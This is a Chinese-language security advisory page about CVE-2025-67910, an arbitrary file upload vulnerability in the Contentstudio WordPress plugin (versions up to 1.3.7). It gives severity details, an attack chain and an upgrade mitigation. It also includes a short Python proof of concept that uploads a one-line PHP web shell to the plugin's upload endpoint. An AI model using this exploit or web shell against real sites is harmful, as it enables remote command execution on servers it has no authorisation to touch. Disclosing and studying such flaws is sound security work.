IPBUF安全漏洞报告
English
CVE-2025-67910 CVSS 9.1 严重

CVE-2025-67910 Contentstudio WordPress插件任意文件上传漏洞

披露日期: 2026-01-08

漏洞信息

漏洞编号
CVE-2025-67910
漏洞类型
任意文件上传
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
WordPress Contentstudio插件 <= 1.3.7

相关标签

任意文件上传WebShell远程代码执行WordPress插件

漏洞概述

Contentstudio WordPress插件存在任意文件上传漏洞,攻击者可以利用此漏洞上传恶意文件(如WebShell)到服务器,从而实现远程代码执行。

技术细节

漏洞源于插件对用户上传的文件类型缺乏充分的验证和过滤,攻击者可通过构造特定的POST请求,上传包含恶意代码的文件。

攻击链分析

STEP 1
1
识别目标站点使用的Contentstudio插件版本
STEP 2
2
构造恶意文件上传请求
STEP 3
3
上传WebShell到服务器
STEP 4
4
通过WebShell执行任意系统命令

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests url = 'http://target.com/wp-content/plugins/contentstudio/upload.php' payload = '<?php system($_GET["cmd"]); ?>' files = {'file': ('shell.php', payload, 'application/x-php')} response = requests.post(url, files=files) print(response.text)

影响范围

Contentstudio WordPress插件 <= 1.3.7

防御指南

临时缓解措施
立即升级到1.3.8或更高版本,或暂时禁用该插件

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表